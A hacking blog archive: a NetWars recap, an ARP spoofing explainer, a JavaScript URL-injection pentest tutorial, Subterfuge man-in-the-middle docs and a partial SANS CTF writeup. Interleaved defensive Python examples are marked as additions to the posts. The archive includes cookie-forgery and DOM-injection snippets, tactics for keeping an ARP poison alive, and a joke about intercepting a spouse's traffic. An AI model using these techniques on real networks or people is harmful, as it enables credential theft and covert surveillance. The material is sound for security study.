Category Archives: Hacking

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

The competitive atmosphere was palpable, and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by, we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that that is what helped me; when things got hard I started to shine.

Exposure: if there were a single word for what I took away from NetWars, that would be it. While trawling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us, acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus: you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice. Nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory:


Finally, the scoreboard at the end of the competition!


ARP Cache Poisoning

This page is currently under construction. The first draft is available, but more content must still be added before the documentation is conclusive. I apologize for the inconvenience.

Happy Hacking!



ARP Cache Poisoning, or ARP Spoofing, is a network-based attack that has been around for a long time; however, very little has been done to address the vulnerability. The issue lies with the lack of authentication, or even verification, in the Address Resolution Protocol. Though this attack is old it is still very effective, and if you think that it will be going away with IPv4, guess again. While the protocol has been removed in the IPv6 specification, the vulnerability still remains in a mechanism called the Neighbor Discovery Protocol, which is basically a very fancy rebranded ARP that solves problems in ARP’s network usage but does nothing to fix the security issues.

Anatomy of the Attack

To understand ARP we first need to dive down into the network layers associated with it. Traffic traveling around your home network gets from one machine to another via layer 2 of the OSI model. More specifically, in a typical Local Area Network packets are switched as frames, not routed. This means that all that fancy TCP/IP overhead associated with the WAN is predominantly a moot point. This makes our LANs much faster, but it also opens up these networks to additional strata of vulnerabilities. The Internet, as we all know, uses IP addresses to get packets from one machine to another, but your LAN uses MAC addresses. In order to translate between the two, we have ARP.

So let us assume for a moment that your computer has an IP address it needs to send packets to, 192.168.1.1, and it is directly connected to the subnet 192.168.1.0/24 (this is the case with most home networks). Since it is connected to the same network as the target machine it must send the information as Ethernet frames, which means it needs the target’s MAC address, not its IP. In order to get the MAC, it broadcasts to everyone on the network (the broadcast MAC address ff:ff:ff:ff:ff:ff) and asks “Who has 192.168.1.1?” The response is supposed to be the MAC address of our destination.

(Figure: Wireshark capture of an ARP poison.)

In an ARP spoofing attack all we have to do is respond to these requests with a different answer, namely our MAC address. Now all traffic that you thought was going to 192.168.1.1 is actually going to the attacker instead. Furthermore, your computer remembers the last ARP response it gets, so if I spam these responses nonstop your computer will always use me as its target, allowing me to sniff all the data you send to that host. If I poison your router, I can get all of your Internet traffic!


Subterfuge’s ARP Cache Poison

If you don’t care how Subterfuge does what it does, and you just want to know how to use it click here!

When we created Subterfuge (a framework to launch man-in-the-middle attacks) the first attack we gave it involved ARP spoofing. We really wanted to stomp on the protocol, hard. Rather than just get the attack to work and release the product, we spent a lot of time testing it against differing configurations and network devices. By its nature an ARP cache poison is a very unstable attack, and implementing it improperly can easily cause a denial of service against the target network. Naturally, this is not at all desired. Our research focused on several key areas: Maintaining the Poison, Maximizing Stealth, and Network Stability.

Maintaining your Poison Versus Stealth & Stability

First we need to discuss the problem: losing a poison. How does it happen? On a typical network the router will occasionally send out a broadcast ARP packet letting everyone on the network know: “I’m still out there, and in case you were wondering, here is my MAC address.” That’s bad! Every time this happens we lose our poison against the network. When it comes to maintaining an ARP poison most effectively there is one key: spam. Because a client PC’s ARP table is always updated to reflect the most recent information it receives from the network, the best way to retain MITM is to send out as many poison packets as possible, but there’s a problem here. The primary reason ARP no longer exists in IPv6 is not security, it’s overhead. Larger networks already tend to have so much ARP traffic that they experience a performance hit. Spamming packets as fast as your NIC can handle is definitely not the optimum solution from a network stability standpoint. Our research indicated that most routers tend to re-ARP a network anywhere between every 8-16 seconds. To combat this, Subterfuge by default poisons the network on an 8 second interval, but finer control is available through the settings page.

Unfortunately, this means that if you lose the poison you could be out of luck for up to 8 seconds. To combat this Subterfuge employs Dynamic ARP Retention: by listening on the wire for ARP messages from the router you can hear its natural responses and send spoofed poison packets to match them. In practice this can cause an ARP storm on some networks and result in a denial of service condition. By default this setting is disabled; however, when enabled it can significantly bolster the stability of your attack. Lastly, you can adjust the rate of poison packets manually from the settings page.
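Both the anatomy section above and the discussion of keeping a poison alive come down to one observable fact: a host’s ARP table accepts whichever reply arrived last, so a poisoned LAN shows the gateway’s IP being claimed by two different MACs, with the second one repeating every few seconds. Here is an added example, written for this page and not part of Subterfuge or the original post, of the defender’s side: a minimal ARP frame parser and a watcher that pins the first MAC seen for each IP (or a pre-seeded trusted one) and alerts on any reply that contradicts it. The traffic is constructed inside the block, the MAC and IP values are made up, and nothing is put on the wire.

```python
import struct

# Wire formats: 14-byte Ethernet header, then the 28-byte ARP body for IPv4 over Ethernet.
ETH_HDR = struct.Struct("!6s6sH")            # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")    # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def ip_bytes(ip): return bytes(int(o) for o in ip.split("."))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip) for an ARP frame, else None."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return op, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Pack a test frame (constructed sample data only; nothing here touches a NIC)."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = ETH_HDR.pack(mac_bytes(eth_dst), mac_bytes(sender_mac), ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, op, mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


class ArpWatcher:
    """Keep the first (or a pre-seeded, trusted) MAC seen for each IP in ARP replies and
    raise an alert whenever a later reply claims that IP with a different MAC: the
    signature of a cache poison. Reply timestamps are kept per IP so a poisoner's
    periodic re-sends stand out from a router's occasional announcement."""

    def __init__(self, trusted=None):
        self.bindings = dict(trusted or {})   # ip -> mac
        self.reply_times = {}                 # ip -> [timestamps]
        self.alerts = []                      # (ts, ip, expected_mac, claimed_mac)

    def observe(self, frame, ts):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None
        _op, sha, spa, _tha, _tpa = parsed
        self.reply_times.setdefault(spa, []).append(ts)
        expected = self.bindings.setdefault(spa, sha)
        if expected != sha:
            alert = (ts, spa, expected, sha)
            self.alerts.append(alert)
            return alert
        return None

    def reply_rate(self, ip, window):
        """Number of replies claiming `ip` within `window` seconds of the latest one."""
        times = self.reply_times.get(ip, [])
        if not times:
            return 0
        return sum(1 for t in times if t >= times[-1] - window)


def run_sample():
    """Constructed traffic: the real router answers once, then a poisoner repeats a
    forged reply for the router's IP every 8 seconds."""
    router_ip, router_mac = "192.168.1.1", "aa:bb:cc:00:00:01"
    victim_ip, victim_mac = "192.168.1.20", "aa:bb:cc:00:00:20"
    poisoner_mac = "de:ad:be:ef:00:01"
    w = ArpWatcher()
    w.observe(build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", router_ip), 0.0)
    w.observe(build_arp(ARP_REPLY, router_mac, router_ip, victim_mac, victim_ip), 0.1)
    for k in range(4):
        w.observe(build_arp(ARP_REPLY, poisoner_mac, router_ip, victim_mac, victim_ip), 1.0 + 8 * k)
    return w


if __name__ == "__main__":
    w = run_sample()
    for ts, ip, expected, claimed in w.alerts:
        print(f"t={ts:5.1f}s  {ip} expected {expected} but {claimed} claimed it")
    print("replies for 192.168.1.1 in the last 20s:", w.reply_rate("192.168.1.1", 20))
```

Running it prints four alerts, one per forged reply, and a reply count for 192.168.1.1 well above what one router announcement every 8-16 seconds would produce. On a real sensor you would seed ArpWatcher with the gateway’s known MAC through the trusted argument, so the very first spoof is caught even if the poisoner spoke before the router did; the same per-IP conflict check, backed by a DHCP snooping table, is what Dynamic ARP Inspection on a managed switch performs.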

Poisoning with Subterfuge

Video coming soon!

Pentesting WebApps with Javascript URL Injection

Synopsis

Ever have to run a pentest sans tools? Breaking a WebApp can be a fairly tedious experience when your intercepting proxy has flown the coop. Believe it or not, many of the functions you may be used to accomplishing through ZAP or Burp Suite can also be done in the URL bar of your browser! URL Injection is a great way to do anything from modifying your browser cookies to changing form data to modifying arbitrary code on the web page.

Injection Basics

For starters, let’s take a look at how it’s done:

Basic URL Injection:

javascript:alert(document.cookie)

The javascript alert function is the progenitor of those annoying popups that pervaded the internet in the nineties, and still exist on the sites of those web developers who haven’t pulled their heads out of a hole in over a decade. For our purposes the alert function is extremely handy. We can use it to quickly interrogate our browsers. The above command, for instance, will display current cookie values for our perusal. Your browser can be interrogated in the same way for just about any of the information that an intercepting proxy yields.

Some web developers handle authentication and session information with cookies. With the above URL Injection revealing this is trivial, and it’s normally one of the first things I do to any WebApp I’m pentesting. Getting information is all well and good, but how can we put this technique to more nefarious purposes?

Cookie Fraud

Javascript URL Injection is my preferred method of modifying web session cookies because it’s quick, easy, and because 60% of the time it works every time. This is most eloquently done with the void() function, though that can be left off.

More Eloquent:
javascript:void(document.cookie="MyCookie=MyValue")

Less Eloquent:
javascript:document.cookie="UserID=42"

The less eloquent method will direct your browser to a blank page (where it will execute your injection). Using that method you have to browse back to the original site for your edits to take effect. It can, however, be easier to remember.
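What makes the cookie tricks above work is that the session cookie is exposed to page script at all. A cookie set with the HttpOnly attribute is neither returned by document.cookie nor overwritable through it, so the alert trick shows nothing and the void() assignment is ignored by the browser. The following added example, mine and not from the original post, audits Set-Cookie headers for that and the two other attributes a session cookie should carry, lists which cookies an injected alert(document.cookie) would display, and builds the header a hardened application should send. The sample headers are constructed; the UserID=42 cookie mirrors the one used in the example above.

```python
# Name fragments that suggest a cookie carries identity or session state.
SESSION_HINTS = ("sess", "sid", "auth", "token", "uid", "userid", "login")


def parse_set_cookie(header):
    """Split one Set-Cookie header value into (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return (name, findings) for a cookie that looks like it carries session state."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if any(hint in name.lower() for hint in SESSION_HINTS):
        if "httponly" not in attrs:
            findings.append("no HttpOnly: readable and writable via document.cookie")
        if "secure" not in attrs:
            findings.append("no Secure: will be sent over plain HTTP")
        if "samesite" not in attrs:
            findings.append("no SameSite: attached to cross-site requests")
    return name, findings


def script_visible(headers):
    """Cookie names that a javascript:alert(document.cookie) injection would display."""
    return [parse_set_cookie(h)[0] for h in headers if "httponly" not in parse_set_cookie(h)[2]]


def build_session_cookie(name, value, max_age=3600):
    """The Set-Cookie value a hardened application should emit for its session cookie."""
    return f"{name}={value}; Path=/; Max-Age={max_age}; HttpOnly; Secure; SameSite=Strict"


# Constructed sample responses: the first two resemble the cookies discussed above.
SAMPLE_HEADERS = [
    "UserID=42; Path=/",
    "PHPSESSID=8f3a1c2e; Path=/; HttpOnly",
    "theme=dark; Path=/; Max-Age=31536000",
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        name, findings = audit_set_cookie(h)
        print(name, "->", findings or "ok")
    print("visible to script:", script_visible(SAMPLE_HEADERS))
    print("hardened:", build_session_cookie("PHPSESSID", "8f3a1c2e"))
```

HttpOnly does not stop an attacker who can already run script from making requests with the cookie attached; it only keeps the value (and the ability to replace it) out of reach of page script, which is exactly the channel the URL bar trick uses.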

Modifying Form Data

One of the most useful aspects of an Intercepting Proxy is its ability to modify form data on the fly. In a pentest we can use this to fuzz the inputs of websites searching for anything from XSS flaws to SQL Injection vulnerabilities. This can also be done with URL Injection. Check it out:

javascript:void(document.forms[0].to.value="");

Editing Arbitrary Web Data

And finally, for those moments when you have to edit some random HTML element on a page, there is the innerHTML property. Check out Google’s new facelift!

(Figure: Google’s home page with the logo replaced.)

javascript:void(document.getElementById('lga').innerHTML="<img src='http://kinozoa.com/images/0sm0s1z.png' style='padding-top:112px'>")

Basically, we can specify an element on the webpage (in this case “lga”). Then using innerHTML we can edit the code in real time, replacing it with more useful stuff.

This function is also pretty nifty when you’ve MITM’d your spouse with Subterfuge and want to do some seamless edits… Because, You Know… Hacker…

 

Combine Subterfuge with Armitage: Adversaries Beware!



Subterfuge and Armitage make a Terrific Duo!

Okay… So you can harvest creds like a boss… What else can you do with Subterfuge? In this video we combine Subterfuge and Raphael Mudge’s Armitage to unleash the full power of Metasploit on our foes!

This video is a good example of how we like to use Subterfuge, but whether it’s Armitage, msfconsole, or a homegrown exploit, Subterfuge can send victims your way. In today’s much more security conscious age you are far more likely to turn a client side exploit into a successful pentest than the remote code execution vulnerabilities that pervaded the past decade.

On Armitage

Armitage gets a lot of flak from some MSF power users, but personally I find its integration with Metasploit’s RPC to be the most convenient way to interact with msfconsole. Mudge has put a ton of work into Armitage over the past couple of years. The result is a sleek, capable tool that just gets the job done. Thanks Rafi!

 


 

Check out his site: Strategic Cyber

Attack Breakdown

Difficulty – Intermediate

Attack Methods – ARP Cache Poisoning, HTTPS Downgrade, Java Signed Applet (Browser Exploit)

Subterfuge Documentation



Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

How to use this Document

Reading through this entire document may be tedious, and will certainly deluge you with information you may have no desire to know. To aid your perusal, below is a short summary of each section, so that you know where to go to get the information you came for:

Introduction

This section is for those of you who are interested in where the Subterfuge Project came from, why it exists, and what we hope to accomplish. The introduction focuses on the risks of MITM attacks, the programmatic structure of Subterfuge, and the community buoying it up.

The Attack

The next portion of the documentation gets right into running Subterfuge. It starts with the most basic usage, and moves on to basic module usage as well as settings and configuration options.

Modules

Extending the attack through Plugins and Modules. This section takes an in depth look at how Subterfuge can really work for you.

Troubleshooting

The most pervasive problem with hacking tools is that they never quite work right for everyone. Between the plethora of different builds we operate, and the differing conditions of each attack, breaking things is almost inevitable. Here’s what to do to fix it.

Third-Party Tool Integration

Subterfuge doesn’t exist in a vacuum, and we didn’t design it that way. Here we discuss the external tools that the project leverages, and how they interact with the framework to make the penetration testing experience more fluid and dynamic.

Extending Subterfuge

Making Subterfuge work for you is easy. This portion of the documentation talks about just how to get deeper functionality out of the system.

Contributing to the Project

Community support for the project has been great so far. If you would like to contribute in some manner then this section might merit your perusal.

Appendices

Other stuff. See for yourself.

Installing Subterfuge on Kali Linux



Walkthrough

This is an install of Subterfuge version 1.0. It takes place on a VirtualBox VM running Kali Linux 1.0.2. Packages were updated by running:

apt-get update
apt-get dist-upgrade

Step 1: Download the Code

Downloads

Step 2: Install Subterfuge

dpkg -i subterfuge_1.0-1_all.deb

Step 3: If the installer errors due to dependency issues install them along with Subterfuge

apt-get update && apt-get -f install

Because Subterfuge has deprecated its old installer and switched over to the Debian packaging system there should no longer be any chance that installing Subterfuge will break your existing packages!

Hopefully this install worked out for you all. Post in the comments if your issues still seem to persist, and we’ll try to help you work it out.

SANS Holiday Challenge 2012

The Year Without a Santa… Hack

Team:
Matthew Toussain (0sm0s1z)
Geoffrey Pamerleau (d0m3$t1c)
Christopher Shields (r00t0v3r1d3)

Thank you to Tim Medin, Ed Skoudis, and Tom Hessman for a fun Friday evening.


Guiding Questions

Where did you find the remainder of Snow Miser’s Zone 1 URL?

Snow Miser failed to utilize appropriate OPSEC measures. As such the remainder of his Zone 1 could be found in the reflection on his “Ice Cold Drink”. https://twitter.com/sn0w_m1s3r/status/276820932104957952/photo/1

What is the key you used with steghide to extract Snow Miser’s Zone 2 URL? Where did you find the key?

The key used was “IceIceBaby!”
It was located in the metadata of the off.jpg image.

On Snow Miser’s Zone 3 page, why is using the same key multiple times a bad idea?

Using the same keys multiple times is a bad idea because if an attacker can deduce the key for one encryption they can use it to decrypt all messages, which were encrypted with the reused key. Since we had access to a combination of known plaintext and ciphertext we could determine the key used and then apply it to the encrypted Zone 4 URL.

What was the coding error in Zone 4 of Heat Miser’s site that allowed you to find the URL for Zone 5?

The PHP Header Redirect failed to specify exit() in order to force stop the execution of the remainder of the page.

How did you manipulate the cookie to get to Zone 5 of Heat Miser’s Control System?

Manipulating the UID cookie to the md5 of 1 allowed access to Heat Miser’s Zone 5 Control System.

Now for the real meat of the writeup:

Heat Miser – Write up:

Zone 0:

Viewing the source code gives us the KEY –> 1732bcff12e6550ff9ea44d594001418

 

Zone 1:

The solution to Zone 1 was simple once you read the HMISER Note on the Zone 0 page:

We had a security concern where the Zone 1 URL ended up in search engine results. We added a file to prevent the search engines from caching these pages. The system is now secure and no unauthorized users have access to the URL.

Search engines use the Robots Exclusion Standard to learn which pages on a given website are publicly viewable. Participating web crawlers check for the existence of a robots.txt file to determine the pages on the site to exclude.

For our purposes, browsing to this file yields the URL of Heat Miser’s Zone 1 Controller: http://heatmiser.counterhack.com/zone-1-E919DBF1-E4FA-4141-97C4-3F38693D2161/

Viewing the source gives us the KEY –> d8c94233daef256c42bb95bd61382e02

 

Zone 2:

The HMISER Note on the Zone 1 page indicates that a link to Zone 2 existed at one time. Viewing the page source reveals the following comment:

<!-- redacted, too many people clicked on the link and took it offline
<a href="/zone-2-761EBBCF-099F-4DB0-B63F-9ADC61825D49">Zone 2</a>
-->

Copying the zone information to the URL bar grants us access to Zone 2. Viewing the source code gives us the KEY –> ef963731de7e886226fe4a6a6c2971f1

 

Zone 3:

Heat Miser gives us the first portion of the link to get to Zone 3:

“zone-3-83FEE8BE-B1C6-4395-A56A-XXXXXXXXXXXX”

But to get to Zone 3 we need a little bit more information. It helps to stalk our targets! @sn0w_m1s3r gives us our first clue:

“Another oops. Brilliant move @h34t_m1s3r. Your OS X term is semi-transparent, hot head! Oh, & u don’t need Metasploit for any of these zones”

Following the breadcrumbs brings us to a tweet by @h34t_m1s3r:

“Hot dog! We have some toolz ready in case we need them later pic.twitter.com/UfyCjJ9P”

If we analyze the image we can see the URL bar of Heat Miser’s browser through his transparent terminal. Opening the image in Gimp and adjusting the brightness and levels makes the image easier to read. Putting the pieces together gives us the new link:

“http://heatmiser.counterhack.com/zone-3-83FEE8BE-B1C6-4395-A56A-BF933FC85254/”

Viewing the source code gives us the KEY –> 0d524fb8d8f9f88eb9da5b286661a824

 

Zone 4:

Zone 3 gives us the link to Zone 4 right off the bat! Accessing the Control System on the other hand is not quite so straightforward. Browsing to the supplied link executes a PHP Header redirect sending the browser to noaccess.php. Snow Miser gives us a hint:

exit()

What he is referring to is the unguarded redirect in Heat Miser’s code. The PHP code causing the redirect looks something like the following:

<?php
header('Location: http://heatmiser.counterhack.com/zone-4-0F2EA639-19BF-40DD-A38D-635E1344C02B/noaccess.php');
?>

The problem results because Heat Miser failed to call exit() after the redirect. This means that the server continues to execute the rest of the code on the page and sends its output along with the redirect. To access this code all we need to do is fetch the page with a client that does not follow the redirect. For our purposes we used Netcat:

nc heatmiser.counterhack.com 80
GET http://heatmiser.counterhack.com/zone-4-0F2EA639-19BF-40DD-A38D-635E1344C02B/ HTTP/1.0

This pulls down the source and reveals the link to Zone 5 as well as the KEY –> e3ae414e6d428c3b0c7cff03783e305f
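The bug here is that PHP’s header() only queues a response header; everything after it still runs and its output is still sent, so the 302 carries the whole protected page in its body, and any client that does not follow the redirect (Netcat above, curl without -L, Python’s http.client) sees it. The fix is to call exit immediately after header('Location: ...'). As an added example, not the challenge’s code, here is a Python check you can run against your own endpoints: it parses a raw response and reports a 3xx that still ships body content, together with a fetch helper that does not follow redirects. The two sample responses are constructed, and the Zone 5 path in them is a placeholder.

```python
import http.client


def split_response(raw):
    """Parse a raw HTTP/1.x response into (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        key, _, val = line.partition(":")
        headers[key.strip().lower()] = val.strip()
    return status, headers, body


def redirect_leaks_body(raw):
    """True when a 3xx response with a Location header still carries page content,
    which is what a PHP header('Location: ...') without exit() produces."""
    status, headers, body = split_response(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return False
    return len(body.strip()) > 0


def fetch_without_following(host, path, port=80):
    """Fetch one URL and return the raw response bytes. http.client never follows
    redirects (unlike urllib or a browser), so the body of a 302 comes back intact.
    Network use is the caller's choice; the sample below does not call this."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", path)
    resp = conn.getresponse()
    status_line = f"HTTP/1.{resp.version % 10} {resp.status} {resp.reason}\r\n".encode()
    header_block = "".join(f"{k}: {v}\r\n" for k, v in resp.getheaders()).encode()
    body = resp.read()
    conn.close()
    return status_line + header_block + b"\r\n" + body


# Constructed samples. LEAKY is the shape of the Zone 4 response: a redirect whose body
# still contains the protected page. FIXED is what the page returns once exit() follows header().
LEAKY = (b"HTTP/1.1 302 Found\r\nLocation: noaccess.php\r\nContent-Type: text/html\r\n\r\n"
         b"<html><body>\n<!-- link to the next zone -->\n"
         b"<a href=\"/zone-5-PLACEHOLDER/\">Zone 5</a>\n</body></html>\n")
FIXED = b"HTTP/1.1 302 Found\r\nLocation: noaccess.php\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY), ("fixed", FIXED)):
        status, headers, body = split_response(raw)
        print(f"{label}: {status} -> {headers.get('location')}, body {len(body)} bytes,"
              f" leaks={redirect_leaks_body(raw)}")
```

A non-empty body on a redirect is not always a bug (a short “moved” stub is common), so treat a hit as something to read, not an automatic failure; what you are looking for is content that should have required the redirect’s target to authorise.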

 

Zone 5:

Zone 5 is interesting… On first inspection it appears much the same as Zone 4, except for one major difference: cookies. Zone 5 uses cookies to authenticate a user before allowing access to the weather controller. Inspecting the cookie by pasting javascript:alert(document.cookie) into the URL bar shows us what it is set to: UID=b8c37e33defde51cf91e1e03e51657da. Reversing the hash (we used www.md5rainbow.com) reveals that the UID is set to the md5 of 1001. That is a standard user identification number on Linux systems. Using that schema, the next step was to try changing the UID in order to escalate privileges. We originally tried 0 for root, but it was a UID of 1 that gave us access:

javascript:void(document.cookie="UID=c4ca4238a0b923820dcc509a6f75849b")

We changed our cookie with the above URL injection, reloaded the page (Zone 5 not noaccess.php), and presto we’re in!

Viewing source gives us the KEY –> f478c549e37fa33467241d847f862e6f
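The weakness in Zone 5 is that the cookie is an unkeyed MD5 of a small integer, which is no more secret than the integer itself: anything a rainbow table can look up, a loop can recompute in a fraction of a second. The added example below (mine, not the challenge’s or Heat Miser’s code) does that recovery for the two hashes in this writeup and then shows the minimal fix, an HMAC over the id under a server-side key, verified in constant time, so a client who knows their own id still cannot mint another user’s cookie. The server key is generated when the module loads and stands in for a real secrets store.

```python
import hashlib
import hmac
import secrets


def md5_hex(text):
    """Hex MD5 of a string, the scheme Heat Miser used for the UID cookie."""
    return hashlib.md5(text.encode()).hexdigest()


def recover_small_int_md5(digest_hex, limit=1_000_000):
    """Return n in [0, limit) with md5(str(n)) == digest_hex, or None.
    The ids in the challenge fall out in well under a second; no table needed."""
    target = digest_hex.lower()
    for n in range(limit):
        if md5_hex(str(n)) == target:
            return n
    return None


# Constructed server-side key; in a real deployment this comes from a secrets store.
SERVER_KEY = secrets.token_bytes(32)


def sign_uid(uid, key=SERVER_KEY):
    """Cookie value 'uid.tag' where tag is an HMAC-SHA256 over the uid: the client may
    read its id, but cannot produce a valid tag for a different id without the key."""
    tag = hmac.new(key, str(uid).encode(), hashlib.sha256).hexdigest()
    return f"{uid}.{tag}"


def verify_uid(cookie, key=SERVER_KEY):
    """Return the uid if the tag verifies, else None; the comparison is constant-time."""
    uid, sep, tag = cookie.rpartition(".")
    if not sep or not uid.isdigit():
        return None
    expected = hmac.new(key, uid.encode(), hashlib.sha256).hexdigest()
    return int(uid) if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    observed = md5_hex("1001")            # the value the cookie held in the writeup
    print("UID cookie resolves to", recover_small_int_md5(observed))
    print("uid 1 would be", md5_hex("1"))
    good = sign_uid(1001)
    print("signed cookie:", good, "->", verify_uid(good))
    tampered = "1." + good.split(".")[1]   # keep the tag, swap the id
    print("tampered cookie ->", verify_uid(tampered))
```

The signed form is the smallest change that closes the hole; the more common design is to put a random session identifier (secrets.token_urlsafe) in the cookie and keep the uid in server-side session storage, so the cookie reveals nothing about the user at all.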

Heat Miser Answers at a Glance:





 

Snow Miser – Write up:

Zone 0:

Viewing the source code gives us the KEY –> 1732bcff12e6550ff9ea44d594001418

 

Zone 1:

Snow Miser’s a bit too fond of his ice cold drinks! Someone should tell him to use proper OPSEC, because the link to his Zone 1 URL is in the reflection on his glass. Flipping the image horizontally and rotating it 180 degrees gives us the rest of the URL for Zone 1:

“F9CDB3AF6226”

Viewing the source code gives us the KEY –> 38bef0b61ba8edda377b626fe6708bfa

 

Zone 2:

Snow Miser lets us know that, because of one of his snow-minions, we have to do image analysis in order to get the URL for Zone 2. Step one is finding the image. The first trick is to get an image in a format that Steghide can use. Viewing the source to pull page resources shows us on.png, but if we click on the disable button the resource changes to off.jpg. Downloading the image and running exiftool on it gives us some notable metadata, namely the passphrase:

“IceIceBaby!”

The next step is to run steghide with the extract switch while specifying the above as the passphrase. Welcome to Zone 2!

“http://snowmiser.counterhack.com/zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3/”

Viewing the source code gives us the KEY –> b8231c2bac801b54f732cfbdcd7e47b7

 

Zone 3:

One of Snow Miser’s minions has been running rampant and messing up the Global Chiller Control System links! In order to facilitate access Snow Miser provides the first part of the Zone 3 URL for his authorized minions:

“zone-3-EAB6B031-4EFA-49F1-B542-XXXXXXXXXXXX”

Additionally, his fraternal nemesis has left us a whopper on Twitter:

“@h34t_m1s3r: Uh oh, @sn0w_m1s3r left his Ice Cream Sandwich Android phone at my volcano. Data extraction complete.”

From here we get the Android file system of Snow Miser’s phone, jackpot! We check the browser cache with some Terminal Fu to see if he’s accessed the Chiller System from his phone:

“strings data/com.android.browser/cache/browser_state.parcel | grep zone-3-EAB6B031”

Yay! Link:

“http://snowmiser.counterhack.com/zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962/”

Viewing the source gives us the KEY –> 08ba610172aade5d1c8ea738013a2e99

 

Zone 4:

Zone 3 Control System… almost there right? Look out, incoming crypto! Fortunately, Snow is kind enough to give us samples of his plaintext and ciphertext, “for verification purposes” of course:

Old Plaintext:

zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B

Old Ciphertext

20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238

New Ciphertext: 20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849

Doing some careful eyeballing gives us some clues on how to start:

Old Plaintext:    z  o  n  e  -  4  -
Old Ciphertext:  20 d9 16 c6 c2 9e e5
New Ciphertext:  20 d9 16 c6 c2 9e e5

